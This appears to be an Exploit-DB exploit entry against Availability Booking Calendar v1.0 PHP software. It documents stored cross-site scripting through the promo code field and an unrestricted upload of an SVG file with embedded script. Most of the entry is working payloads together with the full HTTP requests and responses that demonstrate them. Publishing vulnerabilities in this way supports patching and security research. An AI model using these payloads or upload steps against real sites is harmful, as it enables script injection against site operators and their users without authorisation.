Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) # Date: 07/2023 # Exploit Author: Andrey Stoykov # Tested on: Ubuntu 20.04 # Blog: http://msecureltd.blogspot.com XSS #1: Steps to Reproduce: 1. Browse to Bookings 2. Select All Bookings 3. Edit booking and select Promo Code 4. Enter payload TEST"><script>alert(`XSS`)</script> // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 205 [...] // HTTP GET request to Bookings page GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 33590 [...] [...] <label class="control-label" for="promo_code">Promo code:</label> <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder=""> </div> [...] Unrestricted File Upload #1: // SVG file contents <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> Steps to Reproduce: 1. Browse My Account 2. Image Browse -> Upload 3. Then right click on image 4. Select Open Image in New Tab // HTTP POST request POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 [...] [...] -----------------------------13831219578609189241212424546 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(`XSS`); </script> </svg> [...] // HTTP response HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 190 [...]